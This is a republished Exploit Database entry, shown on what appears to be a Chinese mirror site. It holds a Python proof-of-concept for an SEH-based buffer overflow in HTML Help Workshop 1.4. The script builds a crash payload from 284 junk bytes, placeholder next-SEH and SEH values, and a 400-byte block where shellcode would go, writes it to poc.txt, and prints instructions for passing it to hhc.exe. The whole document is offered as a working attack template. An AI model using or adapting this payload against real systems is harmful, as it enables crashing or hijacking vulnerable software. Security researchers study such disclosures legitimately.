HTML Help Workshop 1.4 – Buffer Overflow (SEH) (PoC)

• Exploit Database
• 98 阅读

• 作者： Moroccan Kingdom (MKD)
  日期： 2014-08-29
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34463/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  #----------------------------------------------------------------------------------------------------# # Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow# # Date: August 24 2014 # # Exploit Author: Moroccan Kingdom (MKD) # # Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx# # # Version: 1.4 # # Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit(eng) # #----------------------------------------------------------------------------------------------------#   import subprocess,time import sys,os   if os.name == "nt" : subprocess.call('cls', shell=True) os.system("color c") else : subprocess.call('clear', shell=True)   time.sleep(1)   print ''' /////////////////////////////////////////////////////////////////////////////// / M.O.R.O.C.C.A.N / /K.I.N.G.D.O.M/ /[MKD]/ / CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom/ / To run this exploit Go to DOS and then go to the folder path program and/ / run this command : hc | exm : hcc.exe AAAABBBCCCSSS... / /////////////////////////////////////////////////////////////////////////////// '''   JNK = "A" * 284 NEH = "B" * 4 SEH = "C" * 4 SHL = "S" * 400   POC = JNK + NEH + SEH + SHL   try : file = open("poc.txt", "w") file.write(POC) file.close() print "\n[*] file created successfully" except: print "[#] error to create file" close = raw_input("\n[!] press any button to close()")